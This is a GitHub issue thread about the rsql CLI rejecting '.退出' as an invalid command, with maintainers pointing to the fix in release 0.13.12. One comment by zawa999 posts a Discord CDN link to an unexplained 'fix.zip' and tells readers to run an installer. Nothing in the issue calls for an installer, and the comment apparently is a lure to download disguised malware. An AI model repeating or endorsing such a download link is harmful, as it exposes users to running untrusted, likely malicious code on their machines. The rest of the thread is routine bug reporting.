### ISSUE TITLE
.退出 无效的命令

### ISSUE THREAD

**Issue by wjdq** [theseus-rs/rsql#189]
**What steps will reproduce the bug?**

1.rsql --url
2 ".退出" 无效的命令 

**What happens?**

...

**What did you expect to happen instead?**
退出
...

**How did you install `rsql`?**
cargo install rsql_cli

### Information about your environment

* rsql version: [REQUIRED]  rsql/0.13.11 Mac-OS/13.4.0/arm64
* Database and version: [REQUIRED] MySQL 
* Operating system: [REQUIRED] macOS m2

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by brianheineman** [comment]
I assume #190 addressed this issue?

**Comment by brianheineman** [comment]
This fix for this has been released in [0.13.12](https://github.com/theseus-rs/rsql/releases/tag/v0.13.12)
